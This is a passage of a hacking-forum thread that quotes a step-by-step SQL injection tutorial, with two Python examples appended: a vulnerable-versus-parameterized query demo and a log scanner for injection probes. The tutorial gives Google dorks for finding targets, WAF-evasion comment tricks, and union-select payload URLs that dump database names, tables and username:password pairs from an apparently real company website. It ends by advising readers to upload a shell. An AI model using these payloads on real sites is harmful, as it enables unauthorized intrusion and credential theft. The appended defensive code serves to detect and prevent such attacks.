SQL injection explained



07-08-2014, 01:56 AM #11
black-hat (TeaM MaDLeeTs)
Good shot, that's nice.

07-04-2017, 10:15 PM #12
833M0L3 (Junior Member)
(06-08-2013, 05:19 AM) madcodE Wrote:
Assalamualaikum,
madcode haxor here from madleets.com.
In my previous article ...

http://www.madleets.com/Thread-WORKING-W...By-madcode


we saw how we create databases, tables, columns, and add records to them in different ways, and now
in this article we will be covering SQL injection: how we can hack using SQL injection.

Please rep+ if you like it; it took me 1 hour to complete.
What is SQL injection?

SQL injection is a very common method of hacking websites in this era.
Well, SQL injection is a big thing; newbies think that it is not a big
deal, as they can exploit this vulnerability with scripts like
sqlmap, Havij, sqlninja and other kiddie scripts,
but SQL injection can be a huge thing that could take many books to cover.
So what can you DO with SQL injection?
You can access records,
you can modify records,
you can bypass login areas,
you can breach the SQL server.

Okay, here our first step begins.

Finding vulnerable websites
Well, if you are a hacker, you must know that
search engines are your best friends. We can find vulnerable websites
using Google dorks.
Common dorks are:
inurl:/index.php?id=
inurl:/home.php?id=
inurl:/article.php?id=
inurl:/news.php?id=

etc. There is a huge list of dorks.

Now if you search any one of these, you will find many websites. Open any of them
and you will see a URL like


Code:
website.com/index.php?id=1

This could be random.
Okay, to test if the site is vulnerable, just put a ' at the end of the URL
and make it look like


Code:
website.com/index.php?id=1'


and if you see some error like

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server
version for the right syntax to use near '\'' at line 1
or
Warning: mysql_fetch_array()

or any MySQL error etc., or if you see some content of the page missing,
then the site is vulnerable.

Example

[Image: lgtf2af.png]

You see, it's a MySQL error, so the website is vulnerable.

So now let's move to the next step.

EXPLOITING the vulnerability

Now that we have found a vulnerable website, it's time to fetch secret data.

So what is our next step? To find the number of columns in the table.

For that we replace ' with an ORDER BY statement,

like

Code:
website.com/index.php?id=1 order by 1--
website.com/index.php?id=1 order by 2--
website.com/index.php?id=1 order by 3--
website.com/index.php?id=1 order by 4--


We need to increase the ORDER BY number till we get some error like
unknown column number, or we find some content missing in the page.

Example

Code:
http://www.cementcorporation.co.in/page.php?id=20 order by 1-- NO ERROR
http://www.cementcorporation.co.in/page.php?id=20 order by 2-- NO ERROR
http://www.cementcorporation.co.in/page.php?id=20 order by 3-- NO ERROR
http://www.cementcorporation.co.in/page.php?id=20 order by 10-- NO ERROR
http://www.cementcorporation.co.in/page.php?id=20 order by 20-- NO ERROR
http://www.cementcorporation.co.in/page.php?id=20 order by 21-- ERROR / CONTENT MISSING IN PAGE


SO NOW WE SEE THAT WE GOT AN ERROR AT ORDER BY 21, BUT NO ERROR AT ORDER BY 20,
SO THAT MEANS WE HAVE 20 COLUMNS.

Sometimes this never works and we don't get an error even at order by 1000;
in that case we put ' at the end of the id / parameter and put + at the end,
like

Code:
http://www.cementcorporation.co.in/page.php?id=20' order by 21--+ error


Now the next step begins.

Union Select

NOW, we know we have 20 columns; now it's time to select all the columns using UNION SELECT.
The SELECT statement is used to view data; if you want to learn more about SQL, you can check my
article on working with SQL.
Okay, for now

we use a statement like


Code:
http://www.cementcorporation.co.in/page.php?id=20 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--


Now you will see some DIGIT of the columns on the page,
like 1, 5, 7 or any other.
If you don't see any, place - before the parameter value.
Example


Code:
http://www.cementcorporation.co.in/page.php?id=-20 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--


You can see in the picture below:

you can see 3 and 4 on the web page. These two are string columns;
we can retrieve our data in these columns.

Sometimes UNION SELECT doesn't work due to a WAF (web application firewall), so we add comments in our queries like
/*!union*/+/*!select*/

/*!union*/+(/*!select*/

un/**/ion+sel/**/ect+1,2,3

/**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/1,2,3

or change case

/*!UnIOn*//*!SeLect*/+1,2,3


etc.



[Image: oksohyM.png]


Now it's time to retrieve data in these columns.

We can retrieve sensitive data. We can call functions for the database name database(), version info version() or @@version, user info user(),
concat(), group_concat(), LOAD_FILE() etc. and many more.

Okay, for the tutorial I will call the version function in column 3 and DB and user info in
column 4 using group_concat().

For that I will use

Code:
http://www.cementcorporation.co.in/page.php?id=-20 union select 1,2,version(),group_concat(database(),0x3a,user()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--


I used 0x3a because it's the hex value of SEMICOLON ( ; ) and it will separate two different values of different parameters.

Now you can see in the image that columns 3 and 4 are now replaced with the values that I called.

[Image: mYXScSV.png]

Okay, next thing:

how to find all databases in the website?

Okay, that's easy.

Now we need to replace the column name with
a query like this


Code:
http://www.cementcorporation.co.in/page.php?id=-20 union select 1,2,3,group_concat(schema_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from information_schema.schemata--



See

[Image: lgt73e3.png]

Now we know there are basically two databases,
information_schema and cementco_cement.
Ignore information_schema.
Why? Because information_schema holds the system tables which define the
databases; we can use these tables to look at the database layout.


Okay, now we have our database (we don't need to check; we can actually use its value. If we are trying to dump in the current database, we can use
its function too, database() instead of cementco_cement. The name is needed when we are dumping outside of the current database,
but in this case we will be simply dumping).

Okay, now let's find the tables in the current DB.

We will use a WHERE condition in this query now.

We will fetch tables with a SELECT statement and use the WHERE condition to determine which database's tables we want to fetch.

Okay,
syntax


Code:
http://www.cementcorporation.co.in/page.php?id=-20 union select 1,2,3,group_concat(table_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from information_schema.tables where table_schema=database()--


[Image: lgt97a9.png]

Now you can see we have all the table names,
which are

archive,corrigendum,eselling,login,login_hindi,login_private,news,tbl_complaint,tbl_email_sender,tbl_email_sender_hindi,tbl_email_sender_private,tbl_home_animation,tbl_home_private,tbl_pages,tbl_pages_hindi,tbl_pages_private,tbl_sub_pages,tbl_tnc,tender,tender2,tender3,tender_drawing,unit

Now we're gonna dump the sensitive table,
which is login.

Okay, let's dump it.

Now we will replace group_concat(table_name) with group_concat(column_name) and information_schema.tables with information_schema.columns,
and in the WHERE condition we will change table_schema to table_name
and give the parameter table_name = name of the table in quotes, like
table_name='login'
Why use quotes? Because its datatype is varchar.
Sometimes it does not work,
so we have to convert it into MySQL CHAR; for that I use Hackbar.

So now our query looks like

(the MySQL CHAR value of login is CHAR(108, 111, 103, 105, 110))

Example


Code:
http://www.cementcorporation.co.in/page.php?id=-20 union select 1,2,3,group_concat(column_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from information_schema.columns where table_name=CHAR(108, 111, 103, 105, 110)--


Yeah, now we can see the columns of table 'login',
which are id,username,password,email,date_added,lastlogin,sessionid,type,status

[Image: 2uxh8Qh.png]

Okay, now the fun begins: time to dump the columns.
For example, if we need to dump the username and password columns from table 'login' we will replace the query with

select group_concat(username,0x3a,password) from login--
Dumped.

Syntax

Code:
http://www.cementcorporation.co.in/page.php?id=-20 union select 1,2,3,group_concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from login--

[Image: sE3M29s.png]

You can see username:password in the webpage.

Now just find the admin panel and upload the shell.

It was easy? Yeah, but sometimes a WAF can fuff your mind.

Now, dealing with error-based SQL injections:

well, I have already posted that tutorial here

http://www.madleets.com/Thread-double-qu...tion-video





WE ARE MADLEETS.COM
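To show the root cause of everything in the quoted tutorial from the application side, here is an added example (not part of the original post, and not code from madleets.com or the site mentioned above). It uses an in-memory SQLite database with invented tables (pages, login) in place of MySQL, so the error text differs from the MySQL messages quoted above, but the mechanism is the same: when the id value is concatenated into the SQL text, the quote probe raises a syntax error, order by N fails exactly when N exceeds the column count, and a union select with the right number of columns pulls rows from another table into the page. The hardened version validates the type and binds the value as a parameter, so the same inputs are rejected or treated as plain data.

```python
import re
import sqlite3


def build_db():
    """Constructed sample schema for the example; the tables and rows are invented."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE pages(id INTEGER, title TEXT, body TEXT);
        CREATE TABLE login(id INTEGER, username TEXT, password TEXT);
        INSERT INTO pages VALUES (20, 'About', 'Company history');
        INSERT INTO login VALUES (1, 'admin', 'hash-of-admin-password');
    """)
    return con


def page_vulnerable(con, id_param):
    """The pattern the tutorial exploits: the raw id value is pasted into the SQL text.

    Whatever follows the number (a quote, 'order by 21--', 'union select ...')
    is parsed by the database as part of the statement.
    """
    sql = "SELECT id, title, body FROM pages WHERE id=" + id_param
    try:
        return con.execute(sql).fetchall()
    except sqlite3.Error as err:
        # A real site would leak this into the page, which is the tutorial's test signal.
        return f"DB error: {err}"


def page_hardened(con, id_param):
    """Allow-list the input type, then bind it; attacker text never reaches the SQL parser."""
    if not re.fullmatch(r"\d{1,9}", id_param):
        return "bad request"  # anything that is not a plain integer id is rejected up front
    sql = "SELECT id, title, body FROM pages WHERE id=?"
    return con.execute(sql, (int(id_param),)).fetchall()


if __name__ == "__main__":
    con = build_db()
    probes = [
        "20",
        "20'",
        "20 order by 3--",
        "20 order by 4--",
        "-20 union select id,username,password from login--",
    ]
    for p in probes:
        print(f"{p!r:60} vulnerable -> {page_vulnerable(con, p)}")
        print(f"{'':60} hardened   -> {page_hardened(con, p)}")
```

The regex allow-list is deliberately stricter than "escape the quotes": the tutorial's numeric payloads contain no quote at all, so quoting or escaping alone would not have stopped the order by and union select steps, while a bound integer parameter stops all of them.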
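The quoted post also lists comment tricks (/*!union*/, un/**/ion, /*U*//*n*/...) used to slip past a WAF that matches on the literal keywords. From the defender's side the lesson is that detection has to normalize before matching. The following added example (mine, not from the original post or from any WAF product) scans constructed Apache-style access log lines, URL-decodes the query string, strips exactly those comment forms, and tags the probe stages the tutorial walks through: the quote test, the order by column count, union select, and information_schema enumeration. The log lines, IPs and URLs are invented for the example.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log sample (invented hosts, paths and timestamps).
SAMPLE_LOG = r"""
203.0.113.5 - - [06/Aug/2013:05:19:01 +0000] "GET /page.php?id=20 HTTP/1.1" 200 5120
203.0.113.5 - - [06/Aug/2013:05:19:04 +0000] "GET /page.php?id=20' HTTP/1.1" 500 312
203.0.113.5 - - [06/Aug/2013:05:19:09 +0000] "GET /page.php?id=20%20order%20by%2021-- HTTP/1.1" 500 312
203.0.113.5 - - [06/Aug/2013:05:19:15 +0000] "GET /page.php?id=-20+/*!union*/+/*!select*/+1,2,3,4 HTTP/1.1" 200 4870
203.0.113.5 - - [06/Aug/2013:05:19:20 +0000] "GET /page.php?id=-20+un/**/ion+sel/**/ect+1,2,version(),group_concat(schema_name)+from+information_schema.schemata-- HTTP/1.1" 200 4900
198.51.100.7 - - [06/Aug/2013:05:20:00 +0000] "GET /news.php?id=7 HTTP/1.1" 200 6100
"""

# Common log format: ip ident user [time] "METHOD url PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3})'
)

# Signatures are applied to the *normalized* query string, in this order.
SIGNATURES = [
    ("quote-probe", re.compile(r"=-?\d+'(\s|$)")),           # id=20'
    ("order-by-probe", re.compile(r"\border\s+by\s+\d+")),    # order by 21
    ("union-select", re.compile(r"\bunion\s+(?:all\s+)?select\b")),
    ("schema-enum", re.compile(r"\binformation_schema\.")),
]


def normalize_query(raw):
    """Undo the encodings and comment tricks a naive keyword filter is fooled by."""
    q = unquote_plus(raw).lower()      # %20 and + both become spaces; case folded
    q = q.replace("/*!", " ")          # MySQL version comment: /*!union*/ -> ' union*/'
    q = q.replace("/**/", "")          # empty comment splitting a keyword: un/**/ion -> union
    q = re.sub(r"/\*|\*/", "", q)      # leftover delimiters: /*u*//*n*/ -> un
    return re.sub(r"\s+", " ", q).strip()


def scan_log(text):
    """Return [(ip, url, [tags])] for every request whose query string matches a signature."""
    findings = []
    for line in text.strip().splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        url = m.group("url")
        query = url.partition("?")[2]
        if not query:
            continue
        norm = normalize_query(query)
        tags = [name for name, rx in SIGNATURES if rx.search(norm)]
        if tags:
            findings.append((m.group("ip"), url, tags))
    return findings


if __name__ == "__main__":
    for ip, url, tags in scan_log(SAMPLE_LOG):
        print(ip, tags, url)
```

Tagging the stages separately is useful in a SIEM: a single quote-probe from a client is noise, but quote-probe followed by order-by-probe and union-select from the same source within a minute is the exact sequence in the tutorial, and the 500 responses on the probe lines are the error leak that the post tells readers to look for, so those are the responses to hide in production.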



07-21-2017, 05:01 AM #13
Dr.Goatse (Junior Member)
Good one bro, hope to see more from you.





